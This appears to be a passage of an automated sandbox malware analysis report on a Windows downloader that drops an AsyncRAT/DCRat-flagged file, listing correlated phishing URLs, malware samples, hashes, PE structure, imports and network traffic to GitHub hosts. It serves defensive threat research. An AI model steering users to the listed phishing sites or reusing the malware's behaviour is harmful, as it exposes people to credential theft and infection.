                              185.199.111.133https://rajkamalkanna.github.io/Facebook-Login-Page/Get hashmaliciousHTMLPhisherBrowse
                                https://vinitk1509.github.io/NETFLIXGet hashmaliciousHTMLPhisherBrowse
                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                    dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                      https://metmaskiloi.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                        http://sis030.github.io/1_Netflix_Deepdive/Get hashmaliciousHTMLPhisherBrowse
                                          https://telagremn.com/Get hashmaliciousUnknownBrowse
                                            http://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                              https://tokenp0kczt.net/Get hashmaliciousHTMLPhisherBrowse
                                                http://tokenpblket.com/Get hashmaliciousHTMLPhisherBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  raw.githubusercontent.comC6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                  • 185.199.109.133
                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                  • 185.199.111.133
                                                  dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                  • 185.199.111.133
                                                  4xBq1SMyQt.exeGet hashmaliciousXWormBrowse
                                                  • 185.199.110.133
                                                  http://gasbot-demos.vercel.app/Get hashmaliciousUnknownBrowse
                                                  • 185.199.109.133
                                                  https://33357.github.io/uniswap-v2Get hashmaliciousUnknownBrowse
                                                  • 185.199.108.133
                                                  https://coinbase-auth.netlify.app/Get hashmaliciousHTMLPhisherBrowse
                                                  • 185.199.110.133
                                                  PO.xlsGet hashmaliciousRemcosBrowse
                                                  • 185.199.108.133
                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                  • 185.199.110.133
                                                  http://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                                  • 185.199.111.133
                                                  github.comhttp://metauscvxlkogimens.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.3
                                                  https://krakenqplogin.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.3
                                                  https://metamasunklogin.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.3
                                                  https://metmaskiloi.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.4
                                                  file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                  • 140.82.121.3
                                                  PO#518464.jsGet hashmaliciousSTRRATBrowse
                                                  • 140.82.121.4

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  FLEXLTD-ASRU4YfxTm3isi.elfGet hashmaliciousMiraiBrowse
                                                  • 45.134.61.237
                                                  botx.x86.elfGet hashmaliciousUnknownBrowse
                                                  • 45.134.61.231
                                                  MV GEOSAND_FINAL DRAFT MR_pdf.exeGet hashmaliciousLokibotBrowse
                                                  • 193.42.113.74
                                                  ZS7QSsD4yz.exeGet hashmaliciousLokibotBrowse
                                                  • 193.42.113.74
                                                  shipping docsETDBL8091.xlsxGet hashmaliciousLokibotBrowse
                                                  • 193.42.113.74
                                                  Arrival Notice.xlsxGet hashmaliciousLokibotBrowse
                                                  • 193.42.113.74
                                                  8tKNSp1IgM.exeGet hashmaliciousVidarBrowse
                                                  • 193.42.113.197
                                                  FASTLYUShttps://polap77.com/Get hashmaliciousHTMLPhisherBrowse
                                                  • 151.101.194.137
                                                  https://www.marketbeat.com/articles/music-streaming-site-spotify-temporarily-goes-down-2024-09-29/?utm_source=newsletter&utm_medium=email&utm_campaign=newsletterclick&source=ARNDaily&AccountID=13091940&hash=99E2922EEB6FEC86743F5DB2C0E84BA5899D68F68F1472F885291F590EAD713452D3376C362A15DEDE29DFC4761637FD6FDD698F31176C60366847F610D6C32CGet hashmaliciousUnknownBrowse
                                                  • 151.101.129.44
                                                  https://ebookkeepers.com.pk/Get hashmaliciousUnknownBrowse
                                                  • 151.101.2.133
                                                  https://mx1.margarettaphilomena.net/Get hashmaliciousUnknownBrowse
                                                  • 199.232.188.157
                                                  https://jenifer-lopezz.pages.dev/Get hashmaliciousUnknownBrowse
                                                  • 185.199.108.153
                                                  https://kaisonfhtr.pages.dev/Get hashmaliciousAnonymous ProxyBrowse
                                                  • 151.101.192.84
                                                  https://jogosderobloxdematazumbie.blogspot.com/Get hashmaliciousUnknownBrowse
                                                  • 151.101.1.140
                                                  https://www.givingday.communityschoolnaples.org/Get hashmaliciousUnknownBrowse
                                                  • 151.101.64.176
                                                  http://hdelm7ye84n38d9lvch0ev4c0.js.wpuserpowered.com/Get hashmaliciousUnknownBrowse
                                                  • 151.101.1.140
                                                  http://www.safari.com/Get hashmaliciousUnknownBrowse
                                                  • 151.101.1.63
                                                  GITHUBUShttps://rajkamalkanna.github.io/Facebook-Login-Page/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.113.21
                                                  http://metauscvxlkogimens.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.3
                                                  https://krakenqplogin.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.3
                                                  https://metamasunklogin.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.3
                                                  https://vinitk1509.github.io/NETFLIXGet hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.5
                                                  https://trezor-docs-info.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.3
                                                  https://metmaskiloi.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.121.4
                                                  http://sis030.github.io/1_Netflix_Deepdive/Get hashmaliciousHTMLPhisherBrowse
                                                  • 140.82.113.18
                                                  file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                  • 140.82.121.3
                                                  https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.5-1/rubyinstaller-devkit-3.3.5-1-x64.exeGet hashmaliciousUnknownBrowse
                                                  • 140.82.121.4

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Win32.BackdoorX-gen.13984.32209.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133
                                                  file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133
                                                  SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeGet hashmaliciousUnknownBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133
                                                  SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeGet hashmaliciousUnknownBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133
                                                  app__v7.1.7_.msiGet hashmaliciousUnknownBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133
                                                  file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133
                                                  file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 140.82.121.3
                                                  • 185.199.111.133

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):49152
                                                  Entropy (8bit):5.623796350941972
                                                  Encrypted:false
                                                  SSDEEP:768:SlV/w9ILiCuu+bi9telDSN+iV08YbygeQ5TQBJFvEgK/Jq0Vc6KN:SlV/Ii9tKDs4zb1qBJFnkJq0VclN
                                                  MD5:2C417B524AED1DA84F185711E5A478F1
                                                  SHA1:48380B5CD38EB374F4B439552E84BCA400D2008B
                                                  SHA-256:8B703CD3353CA564A01BA71E1BD9A60F8DC0FA3AC8E93747A5ADCDB04CE7C79B
                                                  SHA-512:2032760A9625B3862DEAD17143BDC35926A68D7054BA96159123FC45E8EC12553E0C4FF8808F1ECC71EE3660B0C4BBC95B137363B4B5CD94D2E86DD7BFC4EB23
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: unknown
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  • Antivirus: Virustotal, Detection: 72%, Browse
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................................. ........@.. ....................... ............@.................................`...K.......$............................................................................ ............... ..H............text........ ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................H........]...m............................................................/.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(B......*2~.....oC...*.s....%r...po....(g...r...p(....o....o....o....( ... ....(....*.s....%r...po....r...po....%r...po.....o....o....( ...*Vs.........sh........*...(,.....(-........(a...(o........*.r-..p(g...r?..p(....o....(...+.!..

                                                  C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):49152
                                                  Entropy (8bit):5.623796350941972
                                                  Encrypted:false
                                                  SSDEEP:768:SlV/w9ILiCuu+bi9telDSN+iV08YbygeQ5TQBJFvEgK/Jq0Vc6KN:SlV/Ii9tKDs4zb1qBJFnkJq0VclN
                                                  MD5:2C417B524AED1DA84F185711E5A478F1
                                                  SHA1:48380B5CD38EB374F4B439552E84BCA400D2008B
                                                  SHA-256:8B703CD3353CA564A01BA71E1BD9A60F8DC0FA3AC8E93747A5ADCDB04CE7C79B
                                                  SHA-512:2032760A9625B3862DEAD17143BDC35926A68D7054BA96159123FC45E8EC12553E0C4FF8808F1ECC71EE3660B0C4BBC95B137363B4B5CD94D2E86DD7BFC4EB23
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: unknown
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  • Antivirus: Virustotal, Detection: 72%, Browse
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................................. ........@.. ....................... ............@.................................`...K.......$............................................................................ ............... ..H............text........ ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................H........]...m............................................................/.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(B......*2~.....oC...*.s....%r...po....(g...r...p(....o....o....o....( ... ....(....*.s....%r...po....r...po....%r...po.....o....o....( ...*Vs.........sh........*...(,.....(-........(a...(o........*.r-..p(g...r?..p(....o....(...+.!..

                                                  Static File Info

                                                  General

                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Entropy (8bit):5.4183837941963615
                                                  TrID:
                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                  • DOS Executable Generic (2002/1) 0.92%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                  File size:30'208 bytes
                                                  MD5:e40eb702f369e5decfb33b3d78bd4b0c
                                                  SHA1:3de25a909a7d8f20aaa4d9aba60aeb501c247f86
                                                  SHA256:16a2abe3f4f2c005e206318caf37a366e0084fa8ca8561f3642fa0b4f2f04a7e
                                                  SHA512:d015925072810f6ec5044ead32efc8ed6bee2d533c39915ceb526edce20edbc7fd3447423bd6ec608478eb87fdc70c9ad6dcce8b00b8328206adc9294137b60f
                                                  SSDEEP:384:pWIooQkbZYGM0D4DTrMiRShFRDwSH3I6ELjTo0z2d6GHnGtI4qk9QlEM69+j5P0u:nQFGM0D4DKF9wHmhAvP9Ql369aR0
                                                  TLSH:BBD22A67276904ECE236937C85A35A16DAB2BC610742E3CF43A192060F377D1EEBDE11
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o2!.+SO.+SO.+SO."+..'SO...L./SO...K.!SO...J.1SO...N.-SO.`+N.,SO.+SN.RSO.>.F.*SO.>...*SO.>.M.*SO.Rich+SO.........PE..d...x..f...

                                                  File Icon

                                                  Icon Hash:00928e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x140003848
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66CBB578 [Sun Aug 25 22:51:36 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:8c6422f99cddde5bd8d239051984ad7a

                                                  Entrypoint Preview

                                                  Instruction
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F4A68E09890h
                                                  dec eax
                                                  add esp, 28h
                                                  jmp 00007F4A68E08FFFh
                                                  int3
                                                  int3
                                                  retn 0000h
                                                  int3
                                                  inc eax
                                                  push ebx
                                                  dec eax
                                                  sub esp, 20h
                                                  dec eax
                                                  mov ebx, ecx
                                                  xor ecx, ecx
                                                  call dword ptr [000017E7h]
                                                  dec eax
                                                  mov ecx, ebx
                                                  call dword ptr [000017D6h]
                                                  call dword ptr [000017E0h]
                                                  dec eax
                                                  mov ecx, eax
                                                  mov edx, C0000409h
                                                  dec eax
                                                  add esp, 20h
                                                  pop ebx
                                                  dec eax
                                                  jmp dword ptr [000017D4h]
                                                  dec eax
                                                  mov dword ptr [esp+08h], ecx
                                                  dec eax
                                                  sub esp, 38h
                                                  mov ecx, 00000017h
                                                  call dword ptr [000017C8h]
                                                  test eax, eax
                                                  je 00007F4A68E09189h
                                                  mov ecx, 00000002h
                                                  int 29h
                                                  dec eax
                                                  lea ecx, dword ptr [00004BA6h]
                                                  call 00007F4A68E0922Eh
                                                  dec eax
                                                  mov eax, dword ptr [esp+38h]
                                                  dec eax
                                                  mov dword ptr [00004C8Dh], eax
                                                  dec eax
                                                  lea eax, dword ptr [esp+38h]
                                                  dec eax
                                                  add eax, 08h
                                                  dec eax
                                                  mov dword ptr [00004C1Dh], eax
                                                  dec eax
                                                  mov eax, dword ptr [00004C76h]
                                                  dec eax
                                                  mov dword ptr [00004AE7h], eax
                                                  dec eax
                                                  mov eax, dword ptr [esp+40h]
                                                  dec eax
                                                  mov dword ptr [00004BEBh], eax
                                                  mov dword ptr [00004AC1h], C0000409h
                                                  mov dword ptr [00004ABBh], 00000001h
                                                  mov dword ptr [00004AC5h], 00000001h

                                                  Rich Headers

                                                  Programming Language:
                                                  • [IMP] VS2008 SP1 build 30729

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6a040x104.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x1e0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x90000x4ec.pdata
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb0000x98.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x58600x70.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x57200x140.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x50000x390.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x36070x3800c5d519969ef7ccd91fdba2ba5d95fa65False0.5693359375data5.977785649593961IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x50000x2b320x2c0051da2f7cabe90f973696afbdc419d989False0.36585582386363635data4.3376170534768335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x80000x9e80x4002896e51644f1191532b8da845f373c6fFalse0.2216796875DOS executable (block device driver)3.122970109830986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .pdata0x90000x4ec0x60042efbae0755965d87bd10dca4fa9ce3bFalse0.419921875data3.6349355706670803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .rsrc0xa0000x1e00x200101f04294dcfeea9dfe10d3c920461d9False0.529296875data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xb0000x980x20010b3f866dcc8ac3591768175d184eb7eFalse0.287109375data2.0982991704247644IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_MANIFEST0xa0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                  Imports

                                                  DLLImport
                                                  KERNEL32.dllCloseHandle, CreateProcessW, GetExitCodeProcess, RtlLookupFunctionEntry, Sleep, OpenProcess, GetFileAttributesW, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext
                                                  ADVAPI32.dllGetUserNameW
                                                  MSVCP140.dll?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?_Xlength_error@std@@YAXPEBD@Z, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ
                                                  WININET.dllInternetOpenUrlW, InternetReadFile, InternetCloseHandle, InternetOpenW
                                                  VCRUNTIME140_1.dll__CxxFrameHandler4
                                                  VCRUNTIME140.dllmemmove, memset, __current_exception_context, __current_exception, _CxxThrowException, __C_specific_handler, __std_terminate, __std_exception_copy, __std_exception_destroy, memcpy
                                                  api-ms-win-crt-stdio-l1-1-0.dllfwrite, setvbuf, ungetc, fgetc, fclose, fflush, fputc, fgetpos, fread, __p__commode, _get_stream_buffer_pointers, _set_fmode, _fseeki64, fsetpos
                                                  api-ms-win-crt-filesystem-l1-1-0.dll_lock_file, _unlock_file
                                                  api-ms-win-crt-runtime-l1-1-0.dll_initterm, _initterm_e, exit, _exit, _invalid_parameter_noinfo_noreturn, _c_exit, _set_app_type, _get_narrow_winmain_command_line, terminate, _crt_atexit, _configure_narrow_argv, _initialize_narrow_environment, _cexit, _seh_filter_exe, _register_thread_local_exe_atexit_callback, _initialize_onexit_table, _register_onexit_function
                                                  api-ms-win-crt-heap-l1-1-0.dllmalloc, _callnewh, free, _set_new_mode
                                                  api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                  api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 30, 2024 03:24:07.951781988 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:07.951817036 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:07.951898098 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:07.960627079 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:07.960644007 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:08.643265009 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:08.643335104 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:08.794291973 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:08.794317961 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:08.794671059 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:08.794722080 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:08.797732115 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:08.843408108 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:09.117981911 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:09.118036985 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:09.118077040 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:09.118119955 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:09.118127108 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:09.118139029 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:09.118159056 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:09.118197918 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:09.122102022 CEST49710443192.168.2.6140.82.121.3
                                                  Sep 30, 2024 03:24:09.122117996 CEST44349710140.82.121.3192.168.2.6
                                                  Sep 30, 2024 03:24:09.142622948 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.142721891 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.142800093 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.194350958 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.194401026 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.653994083 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.654103994 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.728817940 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.728868961 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.729176044 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.729242086 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.729809046 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.771405935 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.834703922 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.834781885 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.834829092 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.834886074 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.834898949 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.834917068 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.834949017 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.834970951 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.834974051 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.834989071 CEST44349712185.199.111.133192.168.2.6
